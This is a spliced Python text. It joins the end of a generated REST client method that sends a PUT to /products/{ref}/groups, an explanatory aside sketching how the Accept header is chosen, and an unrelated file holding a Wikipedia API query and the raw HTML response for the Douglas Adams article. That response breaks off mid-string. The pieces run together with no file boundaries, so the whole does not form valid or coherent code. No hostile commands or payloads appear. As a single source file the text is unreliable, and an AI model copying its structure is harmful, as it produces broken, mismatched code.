                params['ref'] is None):
            raise ValueError("Missing the required parameter `ref` when calling `products_ref_groups_put`")  # noqa: E501
        # verify the required parameter 'assign_groups_product_request_body' is set
        if ('assign_groups_product_request_body' not in params or
                params['assign_groups_product_request_body'] is None):
            raise ValueError("Missing the required parameter `assign_groups_product_request_body` when calling `products_ref_groups_put`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'ref' in params:
            path_params['ref'] = params['ref']  # noqa: E501

        query_params = []

        header_params = {}
        if 'api_token' in params:
            header_params['api-token'] = params['api_token']  # noqa: E501

        form_params = []
        local_var_files = {}

        body_params = None
        if 'assign_groups_product_request_body' in params:
            body_params = params['assign_groups_product_request_body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/products/{ref}/groups', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ProductShortGroups',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
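Each method sets the `Accept` (and, for body-carrying verbs, `Content-Type`) header via the api_client's selection helpers. A simplified sketch of the selection logic, with behavior assumed from swagger-codegen's usual `ApiClient` implementation rather than taken from this file:

```python
def select_header_accept(accepts):
    # Prefer JSON when the endpoint offers it; otherwise advertise
    # everything the endpoint can produce, comma-separated.
    if not accepts:
        return None
    accepts = [a.lower() for a in accepts]
    if 'application/json' in accepts:
        return 'application/json'
    return ', '.join(accepts)

accept = select_header_accept(['application/json'])
both = select_header_accept(['application/xml', 'text/plain'])
```

Since every endpoint in this section declares only `['application/json']`, the selected header is always `application/json` here.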
# -*- coding:utf-8 -*-
query = 'https://en.wikipedia.org/w/api.php?action=parse&contentmodel=text&disableeditsection=&disablelimitreport=&disabletoc=&format=json&formatversion=2&prop=text|iwlinks|parsetree|wikitext|displaytitle|properties&pageid=8091'
response = r"""
{
"parse": {
"title": "Douglas Adams",
"pageid": 8091,
"text": "<div role=\"note\" class=\"hatnote\">For other people named Douglas Adams, see <a href=\"/wiki/Douglas_Adams_(disambiguation)\" class=\"mw-disambig\" title=\"Douglas Adams (disambiguation)\">Douglas Adams (disambiguation)</a>.</div>\n<table class=\"infobox vcard\" style=\"width:22em\">\n<tr>\n<th colspan=\"2\" style=\"text-align:center;font-size:125%;font-weight:bold\"><span class=\"fn\">Douglas Adams</span></th>\n</tr>\n<tr>\n<td colspan=\"2\" style=\"text-align:center\"><a href=\"/wiki/File:Douglas_adams_portrait_cropped.jpg\" class=\"image\"><img alt=\"Douglas adams portrait cropped.jpg\" src=\"//upload.wikimedia.org/wikipedia/commons/thumb/c/c0/Douglas_adams_portrait_cropped.jpg/220px-Douglas_adams_portrait_cropped.jpg\" width=\"220\" height=\"255\" srcset=\"//upload.wikimedia.org/wikipedia/commons/thumb/c/c0/Douglas_adams_portrait_cropped.jpg/330px-Douglas_adams_portrait_cropped.jpg 1.5x, //upload.wikimedia.org/wikipedia/commons/c/c0/Douglas_adams_portrait_cropped.jpg 2x\" data-file-width=\"333\" data-file-height=\"386\" /></a></td>\n</tr>\n<tr>\n<th scope=\"row\" style=\"padding-top:0.225em;line-height:1.1em;padding-right:0.65em;\">Born</th>\n<td style=\"line-height:1.4em;\">Douglas Noel Adams<br />\n<span style=\"display:none\">(<span class=\"bday\">1952-03-11</span>)</span>11 March 1952<br />\n<a href=\"/wiki/Cambridge\" title=\"Cambridge\">Cambridge</a>, England</td>\n</tr>\n<tr>\n<th scope=\"row\" style=\"padding-top:0.225em;line-height:1.1em;padding-right:0.65em;\">Died</th>\n<td style=\"line-height:1.4em;\">11 May 2001<span style=\"display:none\">(<span class=\"dday deathdate\">2001-05-11</span>)</span> (aged 49)<br />\n<a href=\"/wiki/Montecito,_California\" title=\"Montecito, California\">Montecito, California</a>, U.S.</td>\n</tr>\n<tr>\n<th scope=\"row\" style=\"padding-top:0.225em;line-height:1.1em;padding-right:0.65em;\">Resting place</th>\n<td style=\"line-height:1.4em;\"><a href=\"/wiki/Highgate_Cemetery\" title=\"Highgate 
Cemetery\">Highgate Cemetery</a>, London, England</td>\n</tr>\n<tr>\n<th scope=\"row\" style=\"padding-top:0.225em;line-height:1.1em;padding-right:0.65em;\">Occupation</th>\n<td class=\"role\" style=\"line-height:1.4em;\">Writer</td>\n</tr>\n<tr>\n<th scope=\"row\" style=\"padding-top:0.225em;line-height:1.1em;padding-right:0.65em;\">Alma mater</th>\n<td style=\"line-height:1.4em;\"><a href=\"/wiki/St_John%27s_College,_Cambridge\" title=\"St John's College, Cambridge\">St John's College, Cambridge</a></td>\n</tr>\n<tr>\n<th scope=\"row\" style=\"padding-top:0.225em;line-height:1.1em;padding-right:0.65em;\">Genre</th>\n<td class=\"category\" style=\"line-height:1.4em;\">Science fiction, comedy, satire</td>\n</tr>\n<tr>\n<th colspan=\"2\" style=\"text-align:center\">Website</th>\n</tr>\n<tr>\n<td colspan=\"2\" style=\"text-align:center;line-height:1.4em;\"><span class=\"url\"><a rel=\"nofollow\" class=\"external text\" href=\"http://douglasadams.com/\">douglasadams<wbr />.com</a></span></td>\n</tr>\n</table>\n<p><b>Douglas Noel Adams</b> (11 March 1952 – 11 May 2001) was an <a href=\"/wiki/English_people\" title=\"English people\">English</a> <a href=\"/wiki/Author\" title=\"Author\">author</a>, <a href=\"/wiki/Scriptwriter\" class=\"mw-redirect\" title=\"Scriptwriter\">scriptwriter</a>, <a href=\"/wiki/Essayist\" class=\"mw-redirect\" title=\"Essayist\">essayist</a>, <a href=\"/wiki/List_of_humorists\" title=\"List of humorists\">humourist</a>, <a href=\"/wiki/Satirist\" class=\"mw-redirect\" title=\"Satirist\">satirist</a> and <a href=\"/wiki/Dramatist\" class=\"mw-redirect\" title=\"Dramatist\">dramatist</a>.</p>\n<p>Adams is best known as the author of <i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy\" title=\"The Hitchhiker's Guide to the Galaxy\">The Hitchhiker's Guide to the Galaxy</a></i>, which originated in 1978 as a BBC <a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(radio_series)\" title=\"The Hitchhiker's Guide to the Galaxy (radio 
series)\">radio comedy</a> before developing into a \"trilogy\" of five books that sold more than 15 million copies in his lifetime and generated a <a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(TV_series)\" title=\"The Hitchhiker's Guide to the Galaxy (TV series)\">television series</a>, several stage plays, comics, a <a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(computer_game)\" class=\"mw-redirect\" title=\"The Hitchhiker's Guide to the Galaxy (computer game)\">computer game</a>, and in 2005 a <a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(film)\" title=\"The Hitchhiker's Guide to the Galaxy (film)\">feature film</a>. Adams's contribution to UK radio is commemorated in <a href=\"/wiki/Radio_Academy\" title=\"Radio Academy\">The Radio Academy</a>'s Hall of Fame.<sup id=\"cite_ref-radioacad_1-0\" class=\"reference\"><a href=\"#cite_note-radioacad-1\">[1]</a></sup></p>\n<p>Adams also wrote <i><a href=\"/wiki/Dirk_Gently%27s_Holistic_Detective_Agency\" title=\"Dirk Gently's Holistic Detective Agency\">Dirk Gently's Holistic Detective Agency</a></i> (1987) and <i><a href=\"/wiki/The_Long_Dark_Tea-Time_of_the_Soul\" title=\"The Long Dark Tea-Time of the Soul\">The Long Dark Tea-Time of the Soul</a></i> (1988), and co-wrote <i><a href=\"/wiki/The_Meaning_of_Liff\" title=\"The Meaning of Liff\">The Meaning of Liff</a></i> (1983), <i><a href=\"/wiki/The_Deeper_Meaning_of_Liff\" class=\"mw-redirect\" title=\"The Deeper Meaning of Liff\">The Deeper Meaning of Liff</a></i> (1990), <i><a href=\"/wiki/Last_Chance_to_See\" title=\"Last Chance to See\">Last Chance to See</a></i> (1990), and three stories for the television series <i><a href=\"/wiki/Doctor_Who\" title=\"Doctor Who\">Doctor Who</a></i>; he also served as <a href=\"/wiki/Script_editor\" title=\"Script editor\">script editor</a> for the show's seventeenth season in 1979. 
A posthumous collection of his works, including an unfinished novel, was published as <i><a href=\"/wiki/The_Salmon_of_Doubt\" title=\"The Salmon of Doubt\">The Salmon of Doubt</a></i> in 2002.</p>\n<p>Adams was known as an advocate for environmentalism and <a href=\"/wiki/Conservation_movement\" title=\"Conservation movement\">conservation</a>, as a lover of fast cars, cameras, <a href=\"/wiki/Technological_innovation\" class=\"mw-redirect\" title=\"Technological innovation\">technological innovation</a> and the <a href=\"/wiki/Apple_Macintosh\" class=\"mw-redirect\" title=\"Apple Macintosh\">Apple Macintosh</a>, and as a \"devout <a href=\"/wiki/Atheist\" class=\"mw-redirect\" title=\"Atheist\">atheist</a>\".</p>\n<p></p>\n<h2><span class=\"mw-headline\" id=\"Early_life\">Early life</span></h2>\n<p>Adams was born on 11 March 1952 to Janet (née Donovan; 1927–2016) and Christopher Douglas Adams (1927–1985) in <a href=\"/wiki/Cambridge\" title=\"Cambridge\">Cambridge</a>, England.<sup id=\"cite_ref-ODNB_2-0\" class=\"reference\"><a href=\"#cite_note-ODNB-2\">[2]</a></sup> The following year, <a href=\"/wiki/James_D._Watson\" class=\"mw-redirect\" title=\"James D. Watson\">Watson</a> and <a href=\"/wiki/Francis_Crick\" title=\"Francis Crick\">Crick</a> famously first modelled <a href=\"/wiki/DNA\" title=\"DNA\">DNA</a> at <a href=\"/wiki/Cambridge_University\" class=\"mw-redirect\" title=\"Cambridge University\">Cambridge University</a>, leading Adams to later quip he was DNA in Cambridge months earlier. 
The family moved to <a href=\"/wiki/East_End_of_London\" title=\"East End of London\">East London</a> a few months after his birth, where his sister, Susan, was born three years later.<sup id=\"cite_ref-Adams_xix_3-0\" class=\"reference\"><a href=\"#cite_note-Adams_xix-3\">[3]</a></sup> His parents divorced in 1957; Douglas, Susan, and their mother moved to an <a href=\"/wiki/RSPCA\" class=\"mw-redirect\" title=\"RSPCA\">RSPCA</a> animal shelter in <a href=\"/wiki/Brentwood,_Essex\" title=\"Brentwood, Essex\">Brentwood, Essex</a>, run by his maternal grandparents.<sup id=\"cite_ref-4\" class=\"reference\"><a href=\"#cite_note-4\">[4]</a></sup></p>\n<h3><span class=\"mw-headline\" id=\"Education\">Education</span></h3>\n<p>Adams attended Primrose Hill Primary School in <a href=\"/wiki/Brentwood,_Essex\" title=\"Brentwood, Essex\">Brentwood</a>. At nine, he passed the entrance exam for <a href=\"/wiki/Brentwood_School_(Essex)\" class=\"mw-redirect\" title=\"Brentwood School (Essex)\">Brentwood School</a>, an independent school whose alumni include <a href=\"/wiki/Robin_Day\" title=\"Robin Day\">Robin Day</a>, <a href=\"/wiki/Jack_Straw\" title=\"Jack Straw\">Jack Straw</a>, <a href=\"/wiki/Noel_Edmonds\" title=\"Noel Edmonds\">Noel Edmonds</a>, and <a href=\"/wiki/David_Irving\" title=\"David Irving\">David Irving</a>. <a href=\"/wiki/Griff_Rhys_Jones\" title=\"Griff Rhys Jones\">Griff Rhys Jones</a> was a year below him, and he was in the same class as <a href=\"/wiki/Stuckism\" title=\"Stuckism\">Stuckist</a> artist <a href=\"/wiki/Charles_Thomson_(artist)\" title=\"Charles Thomson (artist)\">Charles Thomson</a>. He attended the <a href=\"/wiki/Preparatory_school_(UK)\" class=\"mw-redirect\" title=\"Preparatory school (UK)\">prep school</a> from 1959 to 1964, then the main school until December 1970. His form master, Frank Halford, said of him: \"Hundreds of boys have passed through the school but Douglas Adams really stood out from the crowd — literally. 
He was unnecessarily tall and in his short trousers he looked a trifle self-conscious.\" \"The form-master wouldn't say 'Meet under the clock tower,' or 'Meet under the war memorial',\" he joked, \"but 'Meet under Adams'.\"<sup id=\"cite_ref-Adams_7_5-0\" class=\"reference\"><a href=\"#cite_note-Adams_7-5\">[5]</a></sup><sup id=\"cite_ref-6\" class=\"reference\"><a href=\"#cite_note-6\">[6]</a></sup> Yet it was his ability to write first-class stories that really made him \"shine\".<sup id=\"cite_ref-Simpson_9_7-0\" class=\"reference\"><a href=\"#cite_note-Simpson_9-7\">[7]</a></sup></p>\n<p>Adams was six feet tall (1.83 m) by age 12 and stopped growing at 6 ft 5 in (1.96 m). He became the only student ever to be awarded a ten out of ten by Halford for creative writing, something he remembered for the rest of his life, particularly when facing <a href=\"/wiki/Writer%27s_block\" title=\"Writer's block\">writer's block</a>.<sup id=\"cite_ref-Adams_xix_3-1\" class=\"reference\"><a href=\"#cite_note-Adams_xix-3\">[3]</a></sup></p>\n<p>Some of his earliest writing was published at the school, such as a report on its photography club in <i>The Brentwoodian</i> in 1962, or spoof reviews in the school magazine <i>Broadsheet</i>, edited by <a href=\"/wiki/Paul_Neil_Milne_Johnstone\" class=\"mw-redirect\" title=\"Paul Neil Milne Johnstone\">Paul Neil Milne Johnstone</a>, who later became a character in <i>The Hitchhiker's Guide</i>. He also designed the cover of one issue of the <i>Broadsheet</i>, and had a letter and short story published nationally in <i><a href=\"/wiki/Eagle_(comic)\" class=\"mw-redirect\" title=\"Eagle (comic)\">The Eagle</a></i>, the boys' comic, in 1965. A poem entitled \"A Dissertation on the task of writing a poem on a candle and an account of some of the difficulties thereto pertaining\" written by Adams in January 1970, at the age of 17, was discovered by archivist Stacey Harmer in a cupboard at the school in early 2014. 
In it, Adams rhymes \"futile\" with \"mute, while\" and \"exhausted\" with \"of course did\".<sup id=\"cite_ref-8\" class=\"reference\"><a href=\"#cite_note-8\">[8]</a></sup> On the strength of a bravura essay on religious poetry that discussed <a href=\"/wiki/The_Beatles\" title=\"The Beatles\">the Beatles</a> and <a href=\"/wiki/William_Blake\" title=\"William Blake\">William Blake</a>, he was awarded an <a href=\"/wiki/Exhibition_(scholarship)\" title=\"Exhibition (scholarship)\">Exhibition</a> in English at <a href=\"/wiki/St_John%27s_College,_Cambridge\" title=\"St John's College, Cambridge\">St John's College, Cambridge</a>, going up in 1971. He wanted to join the <a href=\"/wiki/Footlights\" title=\"Footlights\">Footlights</a>, an invitation-only student comedy club that has acted as a hothouse for comic talent. He was not elected immediately as he had hoped, and started to write and perform in revues with Will Adams (no relation) and Martin Smith, forming a group called \"Adams-Smith-Adams\", but became a member of the Footlights by 1973.<sup id=\"cite_ref-Simpson_30-40_9-0\" class=\"reference\"><a href=\"#cite_note-Simpson_30-40-9\">[9]</a></sup> Despite doing very little work—he recalled having completed three essays in three years—he graduated in 1974 with a B.A. in <a href=\"/wiki/English_literature\" title=\"English literature\">English literature</a>.<sup id=\"cite_ref-ODNB_2-1\" class=\"reference\"><a href=\"#cite_note-ODNB-2\">[2]</a></sup></p>\n<h2><span class=\"mw-headline\" id=\"Career\">Career</span></h2>\n<h3><span class=\"mw-headline\" id=\"Writing\">Writing</span></h3>\n<p>After leaving university Adams moved back to London, determined to break into TV and radio as a writer. An edited version of the <i>Footlights Revue</i> appeared on <a href=\"/wiki/BBC_Two\" title=\"BBC Two\">BBC2</a> television in 1974. 
A version of the Revue performed live in London's <a href=\"/wiki/West_End_of_London\" title=\"West End of London\">West End</a> led to Adams being discovered by <a href=\"/wiki/Monty_Python\" title=\"Monty Python\">Monty Python</a>'s <a href=\"/wiki/Graham_Chapman\" title=\"Graham Chapman\">Graham Chapman</a>. The two formed a brief writing partnership, earning Adams a writing credit in <a href=\"/wiki/List_of_Monty_Python%27s_Flying_Circus_episodes#6._Party_Political_Broadcast\" title=\"List of Monty Python's Flying Circus episodes\">episode 45</a> of <i>Monty Python</i> for a sketch called \"<a href=\"/wiki/Patient_Abuse\" title=\"Patient Abuse\">Patient Abuse</a>\". He is one of only two people outside the original Python members to get a writing credit (the other being <a href=\"/wiki/Neil_Innes\" title=\"Neil Innes\">Neil Innes</a>).<sup id=\"cite_ref-times_10-0\" class=\"reference\"><a href=\"#cite_note-times-10\">[10]</a></sup> The sketch plays on the idea of mind-boggling paper work in an emergency, a joke later incorporated into the <a href=\"/wiki/Vogon\" title=\"Vogon\">Vogons</a>' obsession with paperwork. 
Adams also contributed to a sketch on the album for <i><a href=\"/wiki/Monty_Python_and_the_Holy_Grail\" title=\"Monty Python and the Holy Grail\">Monty Python and the Holy Grail</a></i>.</p>\n<div class=\"thumb tright\">\n<div class=\"thumbinner\" style=\"width:222px;\"><a href=\"/wiki/File:DNA_in_Monty_Python.jpg\" class=\"image\"><img alt=\"\" src=\"//upload.wikimedia.org/wikipedia/en/thumb/0/0a/DNA_in_Monty_Python.jpg/220px-DNA_in_Monty_Python.jpg\" width=\"220\" height=\"198\" class=\"thumbimage\" srcset=\"//upload.wikimedia.org/wikipedia/en/thumb/0/0a/DNA_in_Monty_Python.jpg/330px-DNA_in_Monty_Python.jpg 1.5x, //upload.wikimedia.org/wikipedia/en/thumb/0/0a/DNA_in_Monty_Python.jpg/440px-DNA_in_Monty_Python.jpg 2x\" data-file-width=\"498\" data-file-height=\"448\" /></a>\n<div class=\"thumbcaption\">\n<div class=\"magnify\"><a href=\"/wiki/File:DNA_in_Monty_Python.jpg\" class=\"internal\" title=\"Enlarge\"></a></div>\nAdams in his first <i><a href=\"/wiki/Monty_Python%27s_Flying_Circus\" title=\"Monty Python's Flying Circus\">Monty Python</a></i> appearance, in full surgeon's garb</div>\n</div>\n</div>\n<p>Adams had two brief appearances in the fourth series of <i><a href=\"/wiki/Monty_Python%27s_Flying_Circus\" title=\"Monty Python's Flying Circus\">Monty Python's Flying Circus</a></i>. At the beginning of episode 42, \"The Light Entertainment War\", Adams is in a surgeon's mask (as Dr. Emile Koning, according to on-screen captions), pulling on gloves, while <a href=\"/wiki/Michael_Palin\" title=\"Michael Palin\">Michael Palin</a> narrates a sketch that introduces one person after another but never gets started. At the beginning of episode 44, \"Mr. 
Neutron\", Adams is dressed in a <a href=\"/wiki/List_of_recurring_Monty_Python%27s_Flying_Circus_characters#The_Pepperpots\" title=\"List of recurring Monty Python's Flying Circus characters\">pepper-pot</a> outfit and loads a missile onto a cart driven by <a href=\"/wiki/Terry_Jones\" title=\"Terry Jones\">Terry Jones</a>, who is calling for scrap metal (\"Any old iron...\"). The two episodes were broadcast in November 1974. Adams and Chapman also attempted non-Python projects, including <i><a href=\"/wiki/Out_of_the_Trees\" title=\"Out of the Trees\">Out of the Trees</a></i>.</p>\n<p>At this point Adams's career stalled; his writing style was unsuited to the then-current style of radio and TV comedy.<sup id=\"cite_ref-ODNB_2-2\" class=\"reference\"><a href=\"#cite_note-ODNB-2\">[2]</a></sup> To make ends meet he took a series of odd jobs, including as a hospital porter, barn builder, and chicken shed cleaner. He was employed as a bodyguard by a Qatari family, who had made their fortune in oil. Anecdotes about that job included that the family had once ordered one of everything from a hotel's menu, tried all the dishes, and sent out for hamburgers. Another story had to do with a prostitute sent to the floor Adams was guarding one evening. They acknowledged each other as she entered, and an hour later, when she left, she is said to have remarked, \"At least you can read while you're on the job.\"<sup id=\"cite_ref-11\" class=\"reference\"><a href=\"#cite_note-11\">[11]</a></sup></p>\n<p>During this time Adams continued to write and submit sketches, though few were accepted. In 1976 his career had a brief improvement when he wrote and performed <i>Unpleasantness at Brodie's Close</i> at the <a href=\"/wiki/Edinburgh_Fringe\" class=\"mw-redirect\" title=\"Edinburgh Fringe\">Edinburgh Fringe</a> festival. 
By Christmas work had dried up again, and a depressed Adams moved to live with his mother.<sup id=\"cite_ref-ODNB_2-3\" class=\"reference\"><a href=\"#cite_note-ODNB-2\">[2]</a></sup> The lack of writing work hit him hard, and low confidence became a feature of Adams's life: \"I have terrible periods of lack of confidence [..] I briefly did therapy, but after a while I realised it was like a farmer complaining about the weather. You can't fix the weather – you just have to get on with it\".<sup id=\"cite_ref-Adams_prologue_12-0\" class=\"reference\"><a href=\"#cite_note-Adams_prologue-12\">[12]</a></sup></p>\n<p>Some of Adams's early radio work included sketches for <i><a href=\"/wiki/The_Burkiss_Way\" title=\"The Burkiss Way\">The Burkiss Way</a></i> in 1977 and <i><a href=\"/wiki/The_News_Huddlines\" title=\"The News Huddlines\">The News Huddlines</a></i>.<sup id=\"cite_ref-13\" class=\"reference\"><a href=\"#cite_note-13\">[13]</a></sup> He also wrote, again with Chapman, the 20 February 1977 episode of <i>Doctor on the Go</i>, a sequel to the <i><a href=\"/wiki/Doctor_in_the_House_(TV_series)\" title=\"Doctor in the House (TV series)\">Doctor in the House</a></i> television comedy series.
After the <a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(radio_series)\" title=\"The Hitchhiker's Guide to the Galaxy (radio series)\">first radio series of <i>The Hitchhiker's Guide</i></a> became successful, Adams was made a BBC radio producer, working on <i><a href=\"/wiki/Week_Ending\" title=\"Week Ending\">Week Ending</a></i> and a pantomime called <i><a href=\"/wiki/Black_Cinderella_Two_Goes_East\" title=\"Black Cinderella Two Goes East\">Black Cinderella Two Goes East</a></i>.<sup id=\"cite_ref-14\" class=\"reference\"><a href=\"#cite_note-14\">[14]</a></sup> He left after six months to become the script editor for <i><a href=\"/wiki/Doctor_Who\" title=\"Doctor Who\">Doctor Who</a></i>.</p>\n<p>In 1979 Adams and <a href=\"/wiki/John_Lloyd_(producer)\" title=\"John Lloyd (producer)\">John Lloyd</a> wrote scripts for two half-hour episodes of <i><a href=\"/wiki/Doctor_Snuggles\" title=\"Doctor Snuggles\">Doctor Snuggles</a></i>: \"The Remarkable Fidgety River\" and \"The Great Disappearing Mystery\" (episodes seven and twelve). 
John Lloyd was also co-author of two episodes from the original <i>Hitchhiker</i> radio series (\"Fit the Fifth\" and \"Fit the Sixth\", also known as \"Episode Five\" and \"Episode Six\"), as well as <i><a href=\"/wiki/The_Meaning_of_Liff\" title=\"The Meaning of Liff\">The Meaning of Liff</a></i> and <i><a href=\"/wiki/The_Deeper_Meaning_of_Liff\" class=\"mw-redirect\" title=\"The Deeper Meaning of Liff\">The Deeper Meaning of Liff</a></i>.</p>\n<h4><span class=\"mw-headline\" id=\"The_Hitchhiker.27s_Guide_to_the_Galaxy\"><i>The Hitchhiker's Guide to the Galaxy</i></span></h4>\n<div role=\"note\" class=\"hatnote\">Main article: <a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy\" title=\"The Hitchhiker's Guide to the Galaxy\">The Hitchhiker's Guide to the Galaxy</a></div>\n<p><i>The Hitchhiker's Guide to the Galaxy</i> was a concept for a science-fiction comedy radio series pitched by Adams and radio producer <a href=\"/wiki/Simon_Brett\" title=\"Simon Brett\">Simon Brett</a> to <a href=\"/wiki/BBC_Radio_4\" title=\"BBC Radio 4\">BBC Radio 4</a> in 1977. 
Adams came up with an outline for a pilot episode, as well as a few other stories (reprinted in <a href=\"/wiki/Neil_Gaiman\" title=\"Neil Gaiman\">Neil Gaiman</a>'s book <i><a href=\"/wiki/Don%27t_Panic:_The_Official_Hitchhiker%27s_Guide_to_the_Galaxy_Companion\" title=\"Don't Panic: The Official Hitchhiker's Guide to the Galaxy Companion\">Don't Panic: The Official Hitchhiker's Guide to the Galaxy Companion</a></i>) that could potentially be used in the series.</p>\n<div class=\"thumb tright\">\n<div class=\"thumbinner\" style=\"width:172px;\"><a href=\"/wiki/File:Towelday-Innsbruck.jpg\" class=\"image\"><img alt=\"\" src=\"//upload.wikimedia.org/wikipedia/commons/thumb/1/17/Towelday-Innsbruck.jpg/170px-Towelday-Innsbruck.jpg\" width=\"170\" height=\"227\" class=\"thumbimage\" srcset=\"//upload.wikimedia.org/wikipedia/commons/thumb/1/17/Towelday-Innsbruck.jpg/255px-Towelday-Innsbruck.jpg 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/1/17/Towelday-Innsbruck.jpg/340px-Towelday-Innsbruck.jpg 2x\" data-file-width=\"450\" data-file-height=\"600\" /></a>\n<div class=\"thumbcaption\">\n<div class=\"magnify\"><a href=\"/wiki/File:Towelday-Innsbruck.jpg\" class=\"internal\" title=\"Enlarge\"></a></div>\n<a href=\"/wiki/Towel_Day\" title=\"Towel Day\">Towel Day</a> 2005 in Innsbruck, Austria, where Adams first had the idea of <i>The Hitchhiker's Guide</i>. In the novels a towel is the most useful thing a space traveller can have. The annual Towel Day (25 May) was first celebrated in 2001, two weeks after Adams's death.</div>\n</div>\n</div>\n<p>According to Adams, the idea for the title occurred to him while he lay drunk in a field in <a href=\"/wiki/Innsbruck\" title=\"Innsbruck\">Innsbruck</a>, Austria, gazing at the stars. 
He was carrying a copy of the <i><a href=\"/wiki/Hitch-hiker%27s_Guide_to_Europe\" title=\"Hitch-hiker's Guide to Europe\">Hitch-hiker's Guide to Europe</a></i>, and it occurred to him that \"somebody ought to write a <i>Hitchhiker's Guide to the Galaxy</i>\". He later said that the constant repetition of this anecdote had obliterated his memory of the actual event.<sup id=\"cite_ref-15\" class=\"reference\"><a href=\"#cite_note-15\">[15]</a></sup></p>\n<p>Despite the original outline, Adams was said to make up the stories as he wrote. He turned to <a href=\"/wiki/John_Lloyd_(producer)\" title=\"John Lloyd (producer)\">John Lloyd</a> for help with the final two episodes of <a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_Primary_and_Secondary_Phases#The_Primary_Phase\" title=\"The Hitchhiker's Guide to the Galaxy Primary and Secondary Phases\">the first series</a>. Lloyd contributed bits from an unpublished science fiction book of his own, called <i>GiGax</i>.<sup id=\"cite_ref-16\" class=\"reference\"><a href=\"#cite_note-16\">[16]</a></sup> Very little of Lloyd's material survived in later adaptations of <i>Hitchhiker's</i>, such as the novels and the TV series. The TV series was based on the first six radio episodes, and sections contributed by Lloyd were largely re-written.</p>\n<p><a href=\"/wiki/BBC_Radio_4\" title=\"BBC Radio 4\">BBC Radio 4</a> broadcast the first radio series weekly in the UK in March and April 1978. The series was distributed in the United States by <a href=\"/wiki/National_Public_Radio\" class=\"mw-redirect\" title=\"National Public Radio\">National Public Radio</a>. Following the success of the first series, another episode was recorded and broadcast, which was commonly known as the Christmas Episode. 
<a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_Primary_and_Secondary_Phases#The_Secondary_Phase\" title=\"The Hitchhiker's Guide to the Galaxy Primary and Secondary Phases\">A second series</a> of five episodes was broadcast one per night, during the week of 21–25 January 1980.</p>\n<p>While working on the radio series (and with simultaneous projects such as <i><a href=\"/wiki/The_Pirate_Planet\" title=\"The Pirate Planet\">The Pirate Planet</a></i>) Adams developed problems keeping to writing deadlines that only got worse as he published novels. Adams was never a prolific writer and usually had to be forced by others to do any writing. This included being locked in a hotel suite with his editor for three weeks to ensure that <i><a href=\"/wiki/So_Long,_and_Thanks_for_All_the_Fish\" title=\"So Long, and Thanks for All the Fish\">So Long, and Thanks for All the Fish</a></i> was completed.<sup id=\"cite_ref-17\" class=\"reference\"><a href=\"#cite_note-17\">[17]</a></sup> He was quoted as saying, \"I love deadlines. I love the whooshing noise they make as they go by.\"<sup id=\"cite_ref-Simpson_236_18-0\" class=\"reference\"><a href=\"#cite_note-Simpson_236-18\">[18]</a></sup> Despite the difficulty with deadlines, Adams wrote five novels in the series, published in 1979, 1980, 1982, 1984, and 1992.</p>\n<p>The books formed the basis for other adaptations, such as three-part comic book adaptations for each of the first three books, an interactive text-adventure <a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(computer_game)\" class=\"mw-redirect\" title=\"The Hitchhiker's Guide to the Galaxy (computer game)\">computer game</a>, and a photo-illustrated edition, published in 1994. 
This latter edition featured a <a href=\"/wiki/42_Puzzle\" class=\"mw-redirect\" title=\"42 Puzzle\">42 Puzzle</a> designed by Adams, which was later incorporated into paperback covers of the first four <i>Hitchhiker's</i> novels (the paperback for the fifth re-used the artwork from the hardback edition).<sup id=\"cite_ref-19\" class=\"reference\"><a href=\"#cite_note-19\">[19]</a></sup></p>\n<p>In 1980 Adams also began attempts to turn the first <i>Hitchhiker's</i> novel into a movie, making several trips to Los Angeles, and working with a number of Hollywood studios and potential producers. The next year, the radio series became the basis for a BBC television mini-series<sup id=\"cite_ref-20\" class=\"reference\"><a href=\"#cite_note-20\">[20]</a></sup> broadcast in six parts. When he died in 2001 in California, he had been trying again to get the movie project started with <a href=\"/wiki/Disney\" class=\"mw-redirect\" title=\"Disney\">Disney</a>, which had bought the rights in 1998. The screenplay finally got a posthumous re-write by <a href=\"/wiki/Karey_Kirkpatrick\" title=\"Karey Kirkpatrick\">Karey Kirkpatrick</a>, and <a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(film)\" title=\"The Hitchhiker's Guide to the Galaxy (film)\">the resulting film</a> was released in 2005.</p>\n<p>Radio producer <a href=\"/wiki/Dirk_Maggs\" title=\"Dirk Maggs\">Dirk Maggs</a> had consulted with Adams, first in 1993, and later in 1997 and 2000 about creating a third radio series, based on the third novel in the <i>Hitchhiker's</i> series.<sup id=\"cite_ref-21\" class=\"reference\"><a href=\"#cite_note-21\">[21]</a></sup> They also discussed the possibilities of radio adaptations of the final two novels in the five-book \"trilogy\". As with the movie, this project was only realised after Adams's death. 
